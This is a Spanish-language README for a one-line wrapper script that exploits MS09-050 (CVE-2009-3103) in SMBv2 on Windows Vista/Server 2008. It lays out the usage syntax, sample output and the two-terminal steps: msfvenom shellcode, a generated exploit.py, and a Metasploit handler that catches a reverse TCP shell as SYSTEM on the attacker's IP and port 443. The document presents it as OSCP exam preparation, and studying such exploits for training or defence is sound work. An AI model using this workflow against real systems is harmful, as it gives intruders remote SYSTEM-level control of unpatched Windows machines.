
Envoltorio automatizado de exploit para MS09-050 (CVE-2009-3103) dirigido a SMBv2 en Windows Vista/Server 2008. Genera shellcode, construye el exploit y crea un handler de Metasploit para acceso a shell como SYSTEM.
Configuración de una sola línea para la explotación de MS09-050 (CVE-2009-3103). Sin complicaciones, sin depuración, simplemente funciona.
La mayoría de los scripts de MS09-050 que circulan requieren inyección manual de shellcode, tienen problemas de sincronización con los handlers o simplemente no funcionan. Este contenedor:
Construido para la preparación del OSCP, donde el tiempo importa.
msfvenommsfconsolepython2rpcclient (generalmente preinstalado)./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
./ms09_050.sh 192.168.233.40 192.168.45.232 443
Salida:
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
- exploit.py
- handler.rc
=== RUN ===
Terminal 1: msfconsole -q -r handler.rc
Terminal 2: python2 exploit.py 192.168.233.40
Terminal 1 - Iniciar handler:
msfconsole -q -r handler.rc
Espera a: Started reverse TCP handler on ...
Terminal 2 - Ejecutar exploit:
python2 exploit.py 192.168.233.40
Revisa la Terminal 1 para obtener tu shell.
windows/shell/reverse_tcp) - funciona de manera confiable con el stager en este exploitExploit original basado en PoC de ohnozzy para MS09-050.
MIT - Haz lo que quieras, solo no seas malvado.